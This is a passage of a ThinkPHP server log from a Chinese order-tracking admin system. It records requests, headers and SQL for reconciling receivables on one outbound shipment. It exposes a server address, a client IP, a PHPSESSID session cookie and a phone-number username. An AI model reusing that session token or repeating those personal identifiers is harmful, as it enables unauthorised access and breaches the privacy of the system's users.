outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11823' [ RunTime:0.015048s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1077 LIMIT 1 [ RunTime:0.000620s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1078 LIMIT 1 [ RunTime:0.000332s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1170 LIMIT 1 [ RunTime:0.000446s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1104 LIMIT 1 [ RunTime:0.000311s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 3199 LIMIT 1 [ RunTime:0.000344s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1129 LIMIT 1 [ RunTime:0.000421s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1045 LIMIT 1 [ RunTime:0.000282s ] [ sql ] [ SQL ] SELECT * FROM `ot_productinfo` WHERE `id` = 1060 LIMIT 1 [ RunTime:0.000281s ] [ sql ] [ SQL ] SELECT * FROM `ot_outbound` WHERE `id` = 11823 LIMIT 1 [ RunTime:0.000268s ] --------------------------------------------------------------- [ 2025-12-14T17:00:09+08:00 ] 106.112.204.117 GET /admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702809 [ info ] 47.105.33.115:8081/admin/ajax/lang?callback=define&controllername=financial.verifybill&v=1765702809 [运行时间:0.030121s][吞吐率:33.20req/s] [内存消耗:3,850.14kb] [文件加载:71] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001165s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'ajax', 2 => 'lang', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => '*/*', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11823?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'callback' => 'define', 'controllername' => 'financial.verifybill', 'v' => '1765702809', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001486s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/ajax.php [ info ] [ RUN ] app\admin\controller\Ajax->lang[ /alidata/www/gendan/application/admin/controller/Ajax.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000111s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T17:00:10+08:00 ] 106.112.204.117 POST /admin/staffmge/kehu/getfackehu [ info ] 47.105.33.115:8081/admin/staffmge/kehu/getfackehu [运行时间:0.050966s][吞吐率:19.62req/s] [内存消耗:5,010.32kb] [文件加载:80] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001276s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'staffmge.kehu', 2 => 'getfackehu', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '158', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11823?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'searchTable' => 'tbl', 'searchKey' => 'id', 'searchValue' => '154', 'orderBy' => array ( 0 => array ( 0 => 'name', 1 => 'ASC', ), ), 'showField' => 'name', 'keyField' => 'id', 'keyValue' => '154', 'searchField' => array ( 0 => 'name', ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001610s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/staffmge/kehu.php [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\staffmge\Kehu->getfackehu[ /alidata/www/gendan/application/admin/controller/staffmge/Kehu.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.006002s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000495s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000936s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM `ot_kehu` WHERE `id` IN (154) AND ( factorymge_id =40 ) LIMIT 1 [ RunTime:0.000630s ] [ sql ] [ SQL ] SELECT * FROM `ot_kehu` WHERE `id` IN (154) AND ( factorymge_id =40 ) ORDER BY `name` ASC LIMIT 0,20 [ RunTime:0.000361s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000791s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('' , '{\"searchTable\":\"tbl\",\"searchKey\":\"id\",\"searchValue\":\"154\",\"orderBy\":[[\"name\",\"ASC\"]],\"showField\":\"name\",\"keyField\":\"id\",\"keyValue\":\"154\",\"searchField\":[\"name\"]}' , '/admin/staffmge/kehu/getfackehu' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702810) [ RunTime:0.003974s ] --------------------------------------------------------------- [ 2025-12-14T17:02:56+08:00 ] 106.112.204.117 POST /admin/financial/verifybill/hedui/ids/11823?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11823?dialog=1 [运行时间:0.200112s][吞吐率:5.00req/s] [内存消耗:6,214.49kb] [文件加载:94] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000045s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001443s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'content-length' => '1266', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'origin' => 'http://47.105.33.115:8081', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/x-www-form-urlencoded; charset=UTF-8', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11823?dialog=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'kehu_id' => array ( 0 => '王', 1 => '154', ), 'verify_amount' => array ( 0 => '10032', 1 => '10032', 2 => '10800', 3 => '10800', 4 => '5152', 5 => '5152', 6 => '10032', 7 => '5152', ), 'price' => array ( 0 => '3.6', 1 => '1.1000000000', 2 => '2.8', 3 => '0.9000000000', 4 => '1.56', 5 => '0.4700000000', 6 => '0.6000000000', 7 => '0.2200000000', ), 'money' => array ( 0 => '36115.200000000004', 1 => '11035.2000000000', 2 => '30239.999999999996', 3 => '9720.0000000000', 4 => '8037.12', 5 => '2421.4400000000', 6 => '6019.2000000000', 7 => '1133.4400000000', ), 'explain' => array ( 0 => '200W-8底壳10032个', 1 => '200W-8网盖10032个', 2 => '100W-5底壳10800个', 3 => '100W-2上盖10800个', 4 => '20W-11底壳1.25212个', 5 => '20W-5上盖跳步5152个', 6 => '200W-8散热器10032个', 7 => '20W-1散热器5152个', ), 'shoukuan_status-1' => '0', 'shoukuan_status-2' => '0', 'shoukuan_status-3' => '0', 'shoukuan_status-4' => '0', 'shoukuan_status-5' => '0', 'shoukuan_status-6' => '0', 'shoukuan_status-7' => '0', 'shoukuan_status-8' => '0', 'ids' => '11823', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001820s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.007346s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000485s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000819s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000584s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000735s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001187s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.001023s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000359s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000844s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.001029s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000766s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000802s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000735s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS outbound__buildstaff_id,outbound.staffinfo_id AS outbound__staffinfo_id,outbound.factorymge_id AS outbound__factorymge_id,outbound.complete_status AS outbound__complete_status,outbound.admin_id AS outbound__admin_id,outbound.is_print AS outbound__is_print,outbound.createtime AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11823' [ RunTime:0.024932s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10032,`price`=3.6,`money`=36115.2 WHERE `id` = 27788 [ RunTime:0.006072s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.000862s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000402s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53534 , 1077 , 11823 , 27788 , 1 , 2025 , 12 , 14 , '200W-8底壳10032个' , 1765702976 , 36115.2 , 11145796.190661) [ RunTime:0.005320s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10032,`price`=1.1,`money`=11035.2 WHERE `id` = 27789 [ RunTime:0.004418s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000340s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53535 , 1078 , 11823 , 27789 , 1 , 2025 , 12 , 14 , '200W-8网盖10032个' , 1765702976 , 11035.2 , 11156831.390661) [ RunTime:0.004899s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10800,`price`=2.8,`money`=30240 WHERE `id` = 27790 [ RunTime:0.003683s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000393s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53536 , 1170 , 11823 , 27790 , 1 , 2025 , 12 , 14 , '100W-5底壳10800个' , 1765702976 , 30240 , 11187071.390661) [ RunTime:0.006568s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10800,`price`=0.9,`money`=9720 WHERE `id` = 27791 [ RunTime:0.004938s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000356s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53537 , 1104 , 11823 , 27791 , 1 , 2025 , 12 , 14 , '100W-2上盖10800个' , 1765702976 , 9720 , 11196791.390661) [ RunTime:0.004285s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5152,`price`=1.56,`money`=8037.12 WHERE `id` = 27792 [ RunTime:0.004699s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000442s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53538 , 3199 , 11823 , 27792 , 1 , 2025 , 12 , 14 , '20W-11底壳1.25212个' , 1765702976 , 8037.12 , 11204828.510661) [ RunTime:0.005210s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5152,`price`=0.47,`money`=2421.44 WHERE `id` = 27793 [ RunTime:0.005203s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000384s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53539 , 1129 , 11823 , 27793 , 1 , 2025 , 12 , 14 , '20W-5上盖跳步5152个' , 1765702976 , 2421.44 , 11207249.950661) [ RunTime:0.003992s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=10032,`price`=0.6,`money`=6019.2 WHERE `id` = 27794 [ RunTime:0.002677s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000392s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53541 , 1045 , 11823 , 27794 , 1 , 2025 , 12 , 14 , '200W-8散热器10032个' , 1765702976 , 6019.2 , 11213269.150661) [ RunTime:0.006366s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=5152,`price`=0.22,`money`=1133.44 WHERE `id` = 27795 [ RunTime:0.006129s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000470s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (154 , 40 , 53542 , 1060 , 11823 , 27795 , 1 , 2025 , 12 , 14 , '20W-1散热器5152个' , 1765702976 , 1133.44 , 11214402.590661) [ RunTime:0.005367s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.001011s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u738b\",\"154\"],\"verify_amount\":[\"10032\",\"10032\",\"10800\",\"10800\",\"5152\",\"5152\",\"10032\",\"5152\"],\"price\":[\"3.6\",\"1.1000000000\",\"2.8\",\"0.9000000000\",\"1.56\",\"0.4700000000\",\"0.6000000000\",\"0.2200000000\"],\"money\":[\"36115.200000000004\",\"11035.2000000000\",\"30239.999999999996\",\"9720.0000000000\",\"8037.12\",\"2421.4400000000\",\"6019.2000000000\",\"1133.4400000000\"],\"explain\":[\"200W-8\\u5e95\\u58f310032\\u4e2a\",\"200W-8\\u7f51\\u76d610032\\u4e2a\",\"100W-5\\u5e95\\u58f310800\\u4e2a\",\"100W-2\\u4e0a\\u76d610800\\u4e2a\",\"20W-11\\u5e95\\u58f31.25212\\u4e2a\",\"20W-5\\u4e0a\\u76d6\\u8df3\\u6b655152\\u4e2a\",\"200W-8\\u6563\\u70ed\\u566810032\\u4e2a\",\"20W-1\\u6563\\u70ed\\u56685152\\u4e2a\"],\"shoukuan_status-1\":\"0\",\"shoukuan_status-2\":\"0\",\"shoukuan_status-3\":\"0\",\"shoukuan_status-4\":\"0\",\"shoukuan_status-5\":\"0\",\"shoukuan_status-6\":\"0\",\"shoukuan_status-7\":\"0\",\"shoukuan_status-8\":\"0\",\"ids\":\"11823\"}' , '/admin/financial/verifybill/hedui/ids/11823?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702976) [ RunTime:0.004876s ] --------------------------------------------------------------- [ 2025-12-14T17:02:57+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970992 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970992 [运行时间:0.226427s][吞吐率:4.42req/s] [内存消耗:5,705.53kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001199s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970992', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001562s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ 